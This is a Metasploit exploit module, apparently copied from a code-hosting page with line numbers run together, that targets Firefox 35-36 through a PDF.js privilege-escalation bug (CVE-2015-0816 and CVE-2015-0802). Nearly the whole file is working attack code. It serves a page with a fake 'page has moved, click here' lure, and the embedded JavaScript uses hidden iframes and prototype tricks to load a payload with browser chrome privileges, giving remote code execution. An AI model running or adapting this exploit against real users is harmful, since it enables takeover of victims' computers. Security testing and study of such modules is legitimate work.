Path: blob/master/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb
21626 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ManualRanking78include Msf::Exploit::Remote::BrowserExploitServer9include Msf::Exploit::Remote::FirefoxPrivilegeEscalation1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Firefox PDF.js Privileged Javascript Injection',16'Description' => %q{17This module gains remote code execution on Firefox 35-36 by abusing a18privilege escalation bug in resource:// URIs. PDF.js is used to exploit19the bug. This exploit requires the user to click anywhere on the page to20trigger the vulnerability.21},22'Author' => [23'Unknown', # PDF.js injection code was taken from a 0day24'Marius Mlynski', # discovery and pwn2own exploit25'joev' # copypasta monkey, CVE-2015-080226],27'DisclosureDate' => '2015-03-31',28'License' => MSF_LICENSE,29'References' => [30['CVE', '2015-0816'], # pdf.js can load chrome://31['CVE', '2015-0802'] # can access messageManager property in chrome window32],33'Targets' => [34[35'Universal (Javascript XPCOM Shell)', {36'Platform' => 'firefox',37'Arch' => ARCH_FIREFOX38}39],40[41'Native Payload', {42'Platform' => %w{java linux osx solaris win},43'Arch' => ARCH_ALL44}45]46],47'DefaultTarget' => 0,48'BrowserRequirements' => {49:source => 'script',50:ua_name => HttpClients::FF,51:ua_ver => lambda { |ver| ver.to_i.between?(35, 36) }52},53'Notes' => {54'Reliability' => UNKNOWN_RELIABILITY,55'Stability' => UNKNOWN_STABILITY,56'SideEffects' => UNKNOWN_SIDE_EFFECTS57}58)59)6061register_options([62OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>." ])63])64end6566def on_request_exploit(cli, request, target_info)67print_status('Sending exploit...')68send_response_html(cli, html)69end7071def html72"<!doctype html><html><body>#{datastore['CONTENT'] || default_html}" +73"<script>#{js}</script></body></html>"74end7576def default_html77"The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected."78end7980def js81key = Rex::Text.rand_text_alpha(5 + rand(12))82frame = Rex::Text.rand_text_alpha(5 + rand(12))83r = Rex::Text.rand_text_alpha(5 + rand(12))84opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin8586<<~EOJS87function xml2string(obj) {88return new XMLSerializer().serializeToString(obj);89}9091function __proto(obj) {92return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;93}9495function get(path, callback, timeout, template, value) {96callback = _(callback);97if (template && value) {98callback = callback.replace(template, value);99}100js_call1 = 'javascript:' + _(function() {101try {102done = false;103window.onclick = function() {104if (done) { return; } done = true;105q = open("%url%", "q", "chrome,,top=-9999px,left=-9999px,height=1px,width=1px");106setTimeout(function(){107q.location='data:text/html,<iframe mozbrowser src="about:blank"></iframe>';108109setTimeout(function(){110var opts = #{JSON.unparse(opts)};111var key = opts['#{key}'];112q.messageManager.loadFrameScript('data:,'+key, false);113setTimeout(function(){114q.close();115}, 100)116}, 100)117}, 100);118}119} catch (e) {120history.back();121}122undefined;123}, "%url%", path);124js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined';125sandboxContext(_(function() {126p = __proto(i.contentDocument.styleSheets[0].ownerNode);127l = p.__lookupSetter__.call(i2.contentWindow, 'location');128l.call(i2.contentWindow, window.wrappedJSObject.js_call1);129}));130setTimeout((function() {131sandboxContext(_(function() {132p = __proto(i.contentDocument.styleSheets[0].ownerNode);133l = p.__lookupSetter__.call(i2.contentWindow, 'location');134l.call(i2.contentWindow, window.wrappedJSObject.js_call2);135}));136}), timeout);137}138139function get_data(obj) {140data = null;141try {142data = obj.document.documentElement.innerHTML;143if (data.indexOf('dirListing') < 0) {144throw new Error();145}146} catch (e) {147if (this.document instanceof XMLDocument) {148data = xml2string(this.document);149} else {150try {151if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') {152data = this.document.body.firstChild.textContent;153} else {154throw new Error();155}156} catch (e) {157try {158if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {;159return null;160} else {161throw new Error();162}163} catch (e) {164;;165}166}167}168}169return data;170}171172function _(s, template, value) {173s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1];174s = s.substring(0, s.length - 1);175if (template && value) {176s = s.replace(template, value);177}178s += __proto;179s += xml2string;180s += get_data;181s = s.replace(/\\s\\/\\/.*\\n/g, "");182s = s + ";undefined";183return s;184}185186function get_sandbox_context() {187if (window.my_win_id == null) {188for (var i = 0; i < 20; i++) {189try {190if (window[i].location.toString().indexOf("view-source:") != -1) {191my_win_id = i;192break;193}194} catch (e) {}195}196};197if (window.my_win_id == null)198return;199clearInterval(sandbox_context_i);200object.data = 'view-source:' + blobURL;201window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,';202object.data = 'data:text/html,<'+'html/>';203window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+204'"position:absolute; left:-9999px;" onload = "'+_(function(){205window.wrappedJSObject.sandboxContext=(function(cmd) {206with(importFunction.constructor('return this')()) {207return eval(cmd);208}209});210}) + '"/>');211}212213var HIDDEN = 'position:absolute;left:-9999px;height:1px;width:1px;';214var i = document.createElement("iframe");215i.id = "i";216i.style=HIDDEN;217i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>";218document.documentElement.appendChild(i);219i.onload = function() {220if (this.contentDocument.styleSheets.length > 0) {221var i2 = document.createElement("iframe");222i2.id = "i2";223i2.style='opacity: 0;position:absolute;top:0;left:0;right:0;bottom:0;';224i2.height = window.innerHeight+'px';225i2.width = window.innerWidth+'px';226i2.src = "data:application/pdf,";227document.documentElement.appendChild(i2);228pdfBlob = new Blob([''], {229type: 'application/pdf'230});231blobURL = URL.createObjectURL(pdfBlob);232object = document.createElement('object');233object.style=HIDDEN;234object.data = 'data:application/pdf,';235object.onload = (function() {236sandbox_context_i = setInterval(get_sandbox_context, 200);237object.onload = null;238object.data = 'view-source:' + location.href;239return;240});241document.documentElement.appendChild(object);242} else {243this.contentWindow.location.reload();244}245}246247document.body.style.height = window.innerHeight+'px';248249var kill = setInterval(function() {250if (window.sandboxContext) {251var f = "chrome://browser/content/browser.xul";252get(f, function() {}, 0, "%URL%", f);253clearInterval(kill);254} else {255return;256}257},20);258259EOJS260end261end262263264